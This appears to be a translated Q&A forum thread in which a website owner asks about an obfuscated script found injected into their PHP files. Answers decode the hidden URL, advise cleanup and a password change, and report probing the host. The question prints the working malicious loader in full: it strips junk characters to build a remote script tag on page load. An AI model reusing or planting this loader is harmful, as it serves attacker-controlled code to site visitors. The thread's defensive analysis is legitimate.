1

我在我的网站的 PHP 文件中找到了以下代码。我认为有人能够破解我的 ftp 或者通过某种方式他能够在我的 PHP 文件中添加这个脚本,但不知道如何。

<script>/*Exception*/ document.write('<script src='+'h&)t()#t@$^p^^(:&#/&/!)!@n&o&&$$@v@)!o)t@$e$!))k)^a)@!-$&&@r$u!!.)&u$!i(#m)#^s#()e$#$r#v$^(.!$#)n&e&)t).#p&&)@&i&@c)#h^(u$#!n@))$t)#e@&!r(-!&&c^&o(^m)!)^&.)g($e^)n#^u&&^i$@#n(e$c!@o@!$)l!)#o&$(r$@)s)@&$.&^r(u()&:!)8(0@@!8$&&0!(^/&^!c!^o^!m!^&d&i)#!r$!()e$#c^(t@@.@!d((#e&@/^&^c!!)!)o#((#m&$$d)^)$i&(&r!&e&$)!c@(#t#$.(d^e(!#/&!^e)a!^()r&)t^@h@l@$i(&$n#$^$k(&.&n(#^e#t#/^@w$o^&r@&$l&^d#o!&&#f@()!w((a)(r$!c(!)r!)&#a^&f#$t(&$.#($c(^@o@@m#&^/!@g&#o(^o^&(!&g@l#e^!&&.(c^o#$@m#$/(^##'.replace(/&|\(|\$|\)|\!|\^|@|#/ig, '')+' defer=defer></scr'+'ipt>');</script>
<!--5f81e446ddf4e34599fb494b668c1569-->

但我想知道上面代码的含义,我想它是用 HTML 格式或其他形式加密的,但是上面的代码实际上在做什么以及如何将它注入我的网站?

谢谢。

4

2 回答 2

2

上面的脚本 src 结果地址http://novoteka-ru.uimserv.net.pichunter-com.genuinecolors.ru:8080/comdirect.de/comdirect.de/earthlink.net/worldofwarcraft.com/google.com/

它通过您的网站/脚本中的安全漏洞或直接通过 ftp 进入您的文件。

确保尽快从该恶意代码中清除您的文件,更改您的 ftp 密码并修复您的安全漏洞!

于 2010-02-06T21:29:19.303 回答
0

我不认为它有任何作用。它与Alex 发布的 URL 相同,所以我不会在这里重复。

当我尝试使用curlIE6 的用户代理标头检索它时,将标头记录到文件中,我得到了这些标头:

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 06 Feb 2010 21:37:13 GMT
Content-Type: text/javascript
Connection: close
X-Powered-By: PHP/5.1.6
Expires: 0
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Length: 2

此外,文件的内容似乎只是一个 CRLF。没什么特别的。

我不知道他们为什么把它放在那里,但也许曾经有一些恶意的东西,但现在没有了……或者他们只是在等待一段时间把一些恶意代码放在那里。

于 2010-02-06T21:37:38.413 回答